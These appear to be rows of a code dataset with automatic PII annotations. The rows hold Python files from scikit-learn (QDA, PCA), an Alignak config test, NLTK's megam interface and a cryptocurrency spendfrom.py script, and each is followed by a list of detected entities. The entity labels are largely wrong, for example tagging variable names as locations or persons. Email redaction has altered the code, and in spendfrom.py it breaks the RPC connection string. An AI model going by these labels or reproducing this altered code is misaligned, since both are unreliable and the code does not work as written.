| 5,345 | [['LOCATION', 'BSD-2'], ['NRP', 'self.config'], ['URL', 'config.ge'], ['URL', 'requests.ge'], ['URL', 'requests.exceptions.Re'], ['PERSON', "team_payment_details.get('primary_paid"], ['PERSON', "team_payment_details.get('secondary_paid"], ['PHONE_NUMBER', '1487466146'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'de:: '], ['URL', 'self.co'], ['URL', 'example.com'], ['URL', 'self.co'], ['URL', 'config.ge'], ['URL', 'config.ge'], ['URL', 'req.params.ge'], ['URL', 'req.pa'], ['URL', 'resp.bo'], ['URL', 'item.ge'], ['URL', 'details.ge'], ['URL', 'details.ge'], ['URL', 'roles.ge'], ['URL', 'resp.st'], ['URL', 'resp.bo']] |
81 | """
Quadratic Discriminant Analysis
"""
# Author: Matthieu Perrot dummy@email.com
#
# License: BSD Style.
import warnings
import numpy as np
import scipy.ndimage as ndimage
from .base import BaseEstimator, ClassifierMixin
# FIXME :
# - in fit(X, y) method, many checks are common with other models
# (in particular LDA model) and should be factorized:
# maybe in BaseEstimator ?
class QDA(BaseEstimator, ClassifierMixin):
"""
Quadratic Discriminant Analysis (QDA)
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target vector relative to X
priors : array, optional, shape = [n_classes]
Priors on classes
Attributes
----------
`means_` : array-like, shape = [n_classes, n_features]
Class means
`priors_` : array-like, shape = [n_classes]
Class priors (sum to 1)
`covariances_` : list of array-like, shape = [n_features, n_features]
Covariance matrices of each class
Examples
--------
>>> from sklearn.qda import QDA
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> clf = QDA()
>>> clf.fit(X, y)
QDA(priors=None)
>>> print clf.predict([[-0.8, -1]])
[1]
See also
--------
LDA
"""
def __init__(self, priors=None):
self.priors = np.asarray(priors) if priors is not None else None
def fit(self, X, y, store_covariances=False, tol=1.0e-4):
"""
Fit the QDA model according to the given training data and parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target values (integers)
store_covariances : boolean
If True the covariance matrices are computed and stored in the
self.covariances_ attribute.
"""
X = np.asarray(X)
y = np.asarray(y)
if X.ndim != 2:
raise ValueError('X must be a 2D array')
if X.shape[0] != y.shape[0]:
raise ValueError(
'Incompatible shapes: X has %s samples, while y '
'has %s' % (X.shape[0], y.shape[0]))
if y.dtype.char.lower() not in ('b', 'h', 'i'):
# We need integer values to be able to use
# ndimage.measurements and np.bincount on numpy >= 2.0.
# We currently support (u)int8, (u)int16 and (u)int32.
# Note that versions of scipy >= 0.8 can also accept
# (u)int64. We however don't support it for backwards
# compatibility.
y = y.astype(np.int32)
n_samples, n_features = X.shape
classes = np.unique(y)
n_classes = classes.size
if n_classes < 2:
raise ValueError('y has less than 2 classes')
classes_indices = [(y == c).ravel() for c in classes]
if self.priors is None:
counts = np.array(ndimage.measurements.sum(
np.ones(n_samples, dtype=y.dtype), y, index=classes))
self.priors_ = counts / float(n_samples)
else:
self.priors_ = self.priors
cov = None
if store_covariances:
cov = []
means = []
scalings = []
rotations = []
for group_indices in classes_indices:
Xg = X[group_indices, :]
meang = Xg.mean(0)
means.append(meang)
Xgc = Xg - meang
# Xgc = U * S * V.T
U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)
rank = np.sum(S > tol)
if rank < n_features:
warnings.warn("Variables are collinear")
S2 = (S ** 2) / (len(Xg) - 1)
if store_covariances:
# cov = V * (S^2 / (n-1)) * V.T
cov.append(np.dot(S2 * Vt.T, Vt))
scalings.append(S2)
rotations.append(Vt.T)
if store_covariances:
self.covariances_ = cov
self.means_ = np.asarray(means)
self.scalings = np.asarray(scalings)
self.rotations = rotations
self.classes = classes
return self
def decision_function(self, X):
"""Apply decision function to an array of samples.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples (test vectors).
Returns
-------
C : array, shape = [n_samples, n_classes]
Decision function values related to each class, per sample.
"""
X = np.asarray(X)
norm2 = []
for i in range(len(self.classes)):
R = self.rotations[i]
S = self.scalings[i]
Xm = X - self.means_[i]
X2 = np.dot(Xm, R * (S ** (-0.5)))
norm2.append(np.sum(X2 ** 2, 1))
norm2 = np.array(norm2).T # shape = [len(X), n_classes]
return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1))
+ np.log(self.priors_))
def predict(self, X):
"""Perform classification on an array of test vectors X.
The predicted class C for each sample in X is returned.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
"""
d = self.decision_function(X)
y_pred = self.classes[d.argmax(1)]
return y_pred
def predict_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior probabilities of classification per class.
"""
values = self.decision_function(X)
# compute the likelihood of the underlying gaussian models
# up to a multiplicative constant.
likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis])
# compute posterior probabilities
return likelihood / likelihood.sum(axis=1)[:, np.newaxis]
def predict_log_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior log-probabilities of classification per class.
"""
# XXX : can do better to avoid precision overflows
probas_ = self.predict_proba(X)
return np.log(probas_)
| 7,053 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Matthieu Perrot'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'np.asarray(y'], ['PERSON', "%s'"], ['LOCATION', 'n_samples'], ['PERSON', 'means.append(meang'], ['LOCATION', 'Vt ='], ['NRP', 'V.T'], ['LOCATION', 'Vt'], ['LOCATION', 'rotations.append(Vt'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['NRP', 'gaussian'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['URL', 'email.com'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'clf.fi'], ['URL', 'clf.pr'], ['URL', 'self.pr'], ['URL', 'np.as'], ['URL', 'self.co'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'y.dtype.ch'], ['URL', 'ndimage.me'], ['URL', 'np.bi'], ['URL', 'y.as'], ['URL', 'np.int'], ['URL', 'X.sh'], ['URL', 'classes.si'], ['URL', 'self.pr'], ['URL', 'np.ar'], ['URL', 'ndimage.measurements.su'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'Xg.me'], ['URL', 'np.linalg.sv'], ['URL', 'np.su'], ['URL', 'np.do'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.as'], ['URL', 'self.sc'], ['URL', 'np.as'], ['URL', 'self.ro'], ['URL', 'self.cl'], ['URL', 'np.as'], ['URL', 'self.cl'], ['URL', 'self.ro'], ['URL', 'self.sc'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.su'], ['URL', 'np.ar'], ['URL', 'np.su'], ['URL', 'self.sc'], ['URL', 'self.pr'], ['URL', 'self.de'], ['URL', 'self.cl'], ['URL', 'd.ar'], ['URL', 'self.de'], ['URL', 'np.ne'], ['URL', 'likelihood.su'], ['URL', 'np.ne'], ['URL', 'self.pr']] |
82 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Jean Gabes, dummy@email.com
# Hartmut Goebel, dummy@email.com
# Grégory Starck, dummy@email.com
# Zoran Zaric, dummy@email.com
# Sebastien Coavoux, dummy@email.com
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#
# This file is used to test reading and processing of config files
#
from alignak_test import *
class TestConfig(AlignakTest):
def setUp(self):
self.setup_with_file('etc/alignak_resultmodulation.cfg')
def get_svc(self):
return self.sched.services.find_srv_by_name_and_hostname("test_host_0", "test_ok_0")
def get_host(self):
return self.sched.hosts.find_by_name("test_host_0")
def get_router(self):
return self.sched.hosts.find_by_name("test_router_0")
def test_service_resultmodulation(self):
svc = self.get_svc()
host = self.get_host()
router = self.get_router()
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0'],])
self.assertEqual('UP', host.state)
self.assertEqual('HARD', host.state_type)
# This service got a result modulation. So Criticals are in fact
# Warnings. So even with some CRITICAL (2), it must be warning
self.assertEqual('WARNING', svc.state)
# If we remove the resultmodulations, we should have theclassic behavior
svc.resultmodulations = []
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('CRITICAL', svc.state)
# Now look for the inheritaed thing
# resultmodulation is a inplicit inherited parameter
# and router define it, but not test_router_0/test_ok_0. So this service should also be impacted
svc2 = self.sched.services.find_srv_by_name_and_hostname("test_router_0", "test_ok_0")
self.assertEqual(router.resultmodulations, svc2.resultmodulations)
self.scheduler_loop(2, [[svc2, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('WARNING', svc2.state)
if __name__ == '__main__':
unittest.main()
| 3,666 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2015'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['DATE_TIME', '2009-2014'], ['PERSON', 'Jean Gabes'], ['PERSON', 'Hartmut Goebel'], ['PERSON', 'Grégory Starck'], ['PERSON', 'Zoran Zaric'], ['PERSON', 'Sebastien Coavoux'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'test_service_resultmodulation(self'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.se'], ['URL', 'resultmodulation.cf'], ['URL', 'self.sched.services.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'svc.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'self.sched.services.fi'], ['URL', 'self.as'], ['URL', 'router.re'], ['URL', 'svc2.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc2.st'], ['URL', 'unittest.ma']] |
83 | # Natural Language Toolkit: Interface to Megam Classifier
#
# Copyright (C) 2001-2010 NLTK Project
# Author: Edward Loper dummy@email.com
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
#
# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $
"""
A set of functions used to interface with the external U{megam
<http://www.cs.utah.edu/~hal/megam/>} maxent optimization package.
Before C{megam} can be used, you should tell NLTK where it can find
the C{megam} binary, using the L{config_megam()} function. Typical
usage:
>>> import nltk
>>> nltk.config_megam('.../path/to/megam')
>>> classifier = nltk.MaxentClassifier.train(corpus, 'megam')
"""
__docformat__ = 'epytext en'
import os
import os.path
import subprocess
from nltk.internals import find_binary
try:
import numpy
except ImportError:
numpy = None
######################################################################
#{ Configuration
######################################################################
_megam_bin = None
def config_megam(bin=None):
"""
Configure NLTK's interface to the C{megam} maxent optimization
package.
@param bin: The full path to the C{megam} binary. If not specified,
then nltk will search the system for a C{megam} binary; and if
one is not found, it will raise a C{LookupError} exception.
@type bin: C{string}
"""
global _megam_bin
_megam_bin = find_binary(
'megam', bin,
env_vars=['MEGAM', 'MEGAMHOME'],
binary_names=['megam.opt', 'megam', 'megam_686', 'megam_i686.opt'],
url='http://www.cs.utah.edu/~hal/megam/')
######################################################################
#{ Megam Interface Functions
######################################################################
def write_megam_file(train_toks, encoding, stream,
bernoulli=True, explicit=True):
"""
Generate an input file for C{megam} based on the given corpus of
classified tokens.
@type train_toks: C{list} of C{tuples} of (C{dict}, C{str})
@param train_toks: Training data, represented as a list of
pairs, the first member of which is a feature dictionary,
and the second of which is a classification label.
@type encoding: L{MaxentFeatureEncodingI}
@param encoding: A feature encoding, used to convert featuresets
into feature vectors.
@type stream: C{stream}
@param stream: The stream to which the megam input file should be
written.
@param bernoulli: If true, then use the 'bernoulli' format. I.e.,
all joint features have binary values, and are listed iff they
are true. Otherwise, list feature values explicitly. If
C{bernoulli=False}, then you must call C{megam} with the
C{-fvals} option.
@param explicit: If true, then use the 'explicit' format. I.e.,
list the features that would fire for any of the possible
labels, for each token. If C{explicit=True}, then you must
call C{megam} with the C{-explicit} option.
"""
# Look up the set of labels.
labels = encoding.labels()
labelnum = dict([(label, i) for (i, label) in enumerate(labels)])
# Write the file, which contains one line per instance.
for featureset, label in train_toks:
# First, the instance number.
stream.write('%d' % labelnum[label])
# For implicit file formats, just list the features that fire
# for this instance's actual label.
if not explicit:
_write_megam_features(encoding.encode(featureset, label),
stream, bernoulli)
# For explicit formats, list the features that would fire for
# any of the possible labels.
else:
for l in labels:
stream.write(' #')
_write_megam_features(encoding.encode(featureset, l),
stream, bernoulli)
# End of the isntance.
stream.write('\n')
def parse_megam_weights(s, features_count, explicit=True):
"""
Given the stdout output generated by C{megam} when training a
model, return a C{numpy} array containing the corresponding weight
vector. This function does not currently handle bias features.
"""
if numpy is None:
raise ValueError('This function requires that numpy be installed')
assert explicit, 'non-explicit not supported yet'
lines = s.strip().split('\n')
weights = numpy.zeros(features_count, 'd')
for line in lines:
if line.strip():
fid, weight = line.split()
weights[int(fid)] = float(weight)
return weights
def _write_megam_features(vector, stream, bernoulli):
if not vector:
raise ValueError('MEGAM classifier requires the use of an '
'always-on feature.')
for (fid, fval) in vector:
if bernoulli:
if fval == 1:
stream.write(' %s' % fid)
elif fval != 0:
raise ValueError('If bernoulli=True, then all'
'features must be binary.')
else:
stream.write(' %s %s' % (fid, fval))
def call_megam(args):
"""
Call the C{megam} binary with the given arguments.
"""
if isinstance(args, basestring):
raise TypeError('args should be a list of strings')
if _megam_bin is None:
config_megam()
# Call megam via a subprocess
cmd = [_megam_bin] + args
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
print
print stderr
raise OSError('megam command failed!')
return stdout
| 5,800 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.nltk.org/'], ['DATE_TIME', '2001-2010'], ['PERSON', 'Edward Loper'], ['DATE_TIME', '2063 2004-07-17'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['PERSON', 'megam_i686.opt'], ['PERSON', 'bernoulli=True'], ['LOCATION', 'C{tuples'], ['PERSON', 'bernoulli'], ['PERSON', 'labelnum'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['LOCATION', 'fid'], ['LOCATION', 'fid'], ['LOCATION', 'megam_bin'], ['URL', 'http://www.cs.utah.edu/~hal/megam/'], ['URL', "http://www.cs.utah.edu/~hal/megam/'"], ['URL', 'email.com'], ['URL', 'naivebayes.py'], ['URL', 'nltk.co'], ['URL', 'nltk.MaxentClassifier.tr'], ['URL', 'os.pa'], ['URL', 'nltk.int'], ['URL', 'encoding.la'], ['URL', 's.st'], ['URL', 'line.st'], ['URL', 'p.com'], ['URL', 'p.re']] |
84 | #!/usr/bin/env python
#
# Use the raw transactions API to spend ones received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a oned or One-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the One Core data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/OneCore/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "OneCore")
return os.path.expanduser("~/.onecore")
def read_bitcoin_config(dbdir):
"""Read the one.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "one.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a One Core JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19998 if testnet else 9876
connect = "http://%s:dummy@email.com:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the oned we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(oned):
info = oned.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
oned.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = oned.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(oned):
address_summary = dict()
address_to_account = dict()
for info in oned.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = oned.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = oned.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-one-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(oned, fromaddresses, toaddress, amount, fee):
all_coins = list_available(oned)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to oned.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = oned.createrawtransaction(inputs, outputs)
signed_rawtx = oned.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(oned, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = oned.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(oned, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = oned.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(oned, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get ones from")
parser.add_option("--to", dest="to", default=None,
help="address to get send ones to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of one.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
oned = connect_JSON(config)
if options.amount is None:
address_summary = list_available(oned)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(oned) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(oned, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(oned, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = oned.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
| 9,912 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'spendfrom.py'], ['NRP', 'spendfrom.py'], ['LOCATION', 'jsonrpc'], ['LOCATION', 'json'], ['PERSON', 'json'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['PERSON', 'config_parser = SafeConfigParser'], ['NRP', 'address_to_account'], ['LOCATION', 'fromaddresses'], ['PERSON', 'fromaddresses'], ['NRP', 'float(amount'], ['PERSON', 'FeeError("Rejecting'], ['PERSON', 'FeeError("Rejecting'], ['PERSON', 'FeeError("Rejecting'], ['PERSON', 'one.conf'], ['PERSON', 'txdata = create_tx(oned'], ['PERSON', 'options.fromaddresses.split'], ['URL', 'spendfrom.py'], ['URL', 'spendfrom.py'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'one.co'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.fp.re'], ['URL', 's.fi'], ['URL', 's.fi'], ['URL', 'parser.re'], ['URL', 'os.path.jo'], ['URL', 'one.co'], ['URL', 'parser.it'], ['URL', 'config.ge'], ['URL', 'email.com'], ['URL', 'result.ge'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'getpass.ge'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.li'], ['URL', 'oned.li'], ['URL', 'oned.ge'], ['URL', 'account.ge'], ['URL', 'sys.st'], ['URL', 'oned.cr'], ['URL', 'oned.si'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.de'], ['URL', 'sys.st'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'one.co'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.am'], ['URL', 'summary.it'], ['URL', 'options.am'], ['URL', 'options.fr'], ['URL', 'options.to'], ['URL', 'oned.se']] |
85 | """ Principal Component Analysis
"""
# Author: Alexandre Gramfort dummy@email.com
# Olivier Grisel dummy@email.com
# Mathieu Blondel dummy@email.com
# Denis A. Engemann dummy@email.com
#
# License: BSD 3 clause
from math import log, sqrt
import warnings
import numpy as np
from scipy import linalg
from scipy.special import gammaln
from ..base import BaseEstimator, TransformerMixin
from ..utils import array2d, check_random_state, as_float_array
from ..utils import atleast2d_or_csr
from ..utils.extmath import fast_logdet, safe_sparse_dot, randomized_svd, \
fast_dot
def _assess_dimension_(spectrum, rank, n_samples, n_features):
"""Compute the likelihood of a rank ``rank`` dataset
The dataset is assumed to be embedded in gaussian noise of shape(n,
dimf) having spectrum ``spectrum``.
Parameters
----------
spectrum: array of shape (n)
data spectrum
rank: int,
tested rank value
n_samples: int,
number of samples
dim: int,
embedding/empirical dimension
Returns
-------
ll: float,
The log-likelihood
Notes
-----
This implements the method of `Thomas P. Minka:
Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`
"""
if rank > len(spectrum):
raise ValueError("The tested rank cannot exceed the rank of the"
" dataset")
pu = -rank * log(2.)
for i in range(rank):
pu += (gammaln((n_features - i) / 2.)
- log(np.pi) * (n_features - i) / 2.)
pl = np.sum(np.log(spectrum[:rank]))
pl = -pl * n_samples / 2.
if rank == n_features:
pv = 0
v = 1
else:
v = np.sum(spectrum[rank:]) / (n_features - rank)
pv = -np.log(v) * n_samples * (n_features - rank) / 2.
m = n_features * rank - rank * (rank + 1.) / 2.
pp = log(2. * np.pi) * (m + rank + 1.) / 2.
pa = 0.
spectrum_ = spectrum.copy()
spectrum_[rank:n_features] = v
for i in range(rank):
for j in range(i + 1, len(spectrum)):
pa += log((spectrum[i] - spectrum[j]) *
(1. / spectrum_[j] - 1. / spectrum_[i])) + log(n_samples)
ll = pu + pl + pv + pp - pa / 2. - rank * log(n_samples) / 2.
return ll
def _infer_dimension_(spectrum, n_samples, n_features):
"""Infers the dimension of a dataset of shape (n_samples, n_features)
The dataset is described by its spectrum `spectrum`.
"""
n_spectrum = len(spectrum)
ll = np.empty(n_spectrum)
for rank in range(n_spectrum):
ll[rank] = _assess_dimension_(spectrum, rank, n_samples, n_features)
return ll.argmax()
class PCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA)
Linear dimensionality reduction using Singular Value Decomposition of the
data and keeping only the most significant singular vectors to project the
data to a lower dimensional space.
This implementation uses the scipy.linalg implementation of the singular
value decomposition. It only works for dense arrays and is not scalable to
large dimensional data.
The time complexity of this implementation is ``O(n ** 3)`` assuming
n ~ n_samples ~ n_features.
Parameters
----------
n_components : int, None or string
Number of components to keep.
if n_components is not set all components are kept::
n_components == min(n_samples, n_features)
if n_components == 'mle', Minka\'s MLE is used to guess the dimension
if ``0 < n_components < 1``, select the number of components such that
the amount of variance that needs to be explained is greater than the
percentage specified by n_components
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
whiten : bool, optional
When True (False by default) the `components_` vectors are divided
by n_samples times singular values to ensure uncorrelated outputs
with unit component-wise variances.
Whitening will remove some information from the transformed signal
